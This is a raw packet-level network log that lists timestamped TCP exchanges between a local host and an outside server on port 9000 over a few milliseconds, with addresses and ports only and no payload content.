May 19, 2024 09:09:08.785384893 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.785398006 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.785413027 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.785423994 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.785428047 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.785444021 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.785444975 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.785459995 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.785468102 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.785485029 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.785512924 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.785623074 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.785677910 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.785820961 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.785815954 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.785815954 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.785839081 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.785852909 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.785912037 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.785912037 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.786144018 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.786159039 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.786171913 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.786186934 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.786206007 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.786242008 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.786566973 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.786581039 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.786593914 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.786607981 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.786622047 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.786636114 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.786636114 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.786652088 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.786658049 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.786665916 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.786683083 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.786700964 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.786700964 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.786735058 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.787309885 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.787341118 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.787369967 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.787374973 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.787395954 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.787426949 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.787775040 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.787803888 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.787828922 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.787832022 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.787854910 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.787863016 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.787890911 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.787906885 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.787906885 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.787919998 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.787941933 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.787950039 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.787966013 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.787980080 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.788006067 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.788007975 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.788026094 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.788038969 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.788048029 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.788085938 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.788506031 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.788566113 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.788744926 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.788773060 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.788799047 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.788801908 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.788825989 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.788826942 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.788845062 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.788857937 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.788887024 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.788913965 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.788914919 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.788933992 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.788945913 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.788964033 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.788975000 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.789000034 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.789004087 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.789020061 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.789033890 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.789047003 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.789136887 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.789632082 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.789660931 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.789685965 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.789690971 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.789714098 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.789716005 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.789731979 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.789743900 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.789751053 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.789772987 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.789789915 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.789802074 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.789814949 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.789830923 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.789858103 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.789860010 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.789879084 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.789885998 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.789901972 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.789912939 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.789927006 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.789962053 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.790473938 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.790503025 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.790533066 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.790539980 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.790539980 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.790560961 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.790575981 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.790591002 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.790607929 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.790620089 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.790631056 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.790649891 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.790663004 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.790679932 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.790694952 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.790719986 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.791196108 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.791224957 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.791249990 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.791273117 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.791277885 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.791301966 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.791307926 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.791328907 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.791337967 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.791348934 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.791368961 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.791379929 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.791398048 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.791412115 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.791440010 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.791816950 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.791846991 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.791873932 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.791876078 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.791927099 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.791927099 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.791970968 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.792052984 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.792201042 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.792229891 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.792246103 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.792254925 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.792272091 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.792284012 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.792294979 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.792315006 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.792326927 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.792344093 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.792365074 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.792375088 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.792393923 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.792402983 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.792432070 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.792455912 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.792942047 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.792970896 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.792993069 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.793000937 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.793016911 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.793030024 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.793041945 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.793057919 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.793073893 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.793090105 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.793097973 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.793132067 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.793147087 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.793164015 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.793184996 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.793210030 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.793689013 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.793718100 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.793745995 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.793775082 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.793776035 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.793776035 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.793802023 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.793803930 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.793822050 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.793833971 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.793842077 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.793864012 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.793875933 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.793894053 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.793905973 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.793953896 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.794358969 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.794418097 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.794492006 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.794521093 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.794559956 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.794584036 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.794612885 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.794641972 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.794662952 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.794686079 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.794915915 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.794945002 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.794960976 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.794974089 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.794985056 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.795005083 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.795013905 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.795034885 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.795047045 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.795064926 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.795078039 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.795094013 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.795108080 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.795139074 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.795504093 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.795562029 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.795677900 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.795707941 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.795737028 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.795753956 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.795764923 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.795789003 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.795794010 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.795823097 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.795824051 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.795845032 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.795867920 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.796206951 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.796236992 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.796262026 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.796267033 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.796300888 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.796300888 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.796407938 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.796436071 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.796461105 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.796497107 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.796561956 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.796591043 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.796616077 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.796643019 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.796643972 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.796662092 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.796674013 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.796684980 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.796704054 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.796715975 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.796745062 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.797102928 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.797133923 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.797161102 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.797185898 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.797229052 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.797336102 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.797367096 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.797390938 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.797425032 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.797491074 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.797523022 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.797542095 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.797554970 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.797564030 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.797588110 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.797595978 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.797619104 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.797626019 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.797651052 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.797660112 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.797683954 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.797693014 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.797717094 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.797724009 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.797749043 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.797758102 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.797888041 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.798024893 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.798074961 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.798105955 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.798127890 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.798137903 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.798146009 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.798171043 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.798186064 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.798202991 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.798213005 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.798237085 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.798248053 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.798270941 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.798283100 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.798310041 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.798618078 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.798656940 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.798702955 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.798733950 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.798788071 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.798825979 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.798860073 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.798876047 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.798892975 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.798902988 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.798944950 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.799088955 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.799122095 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.799148083 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.799153090 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.799156904 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.799247026 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.799278021 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.799295902 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.799310923 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.799321890 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.799359083 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.799431086 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.799463987 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.799474001 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.799495935 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.799530029 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.799541950 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.799568892 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.799700022 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.799732924 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.799741983 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.799765110 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.799773932 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.799799919 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.799804926 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.799877882 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.799928904 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.800052881 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.800071955 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.800095081 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.800117016 CEST	9000	49750	116.202.5.235	192.168.2.4
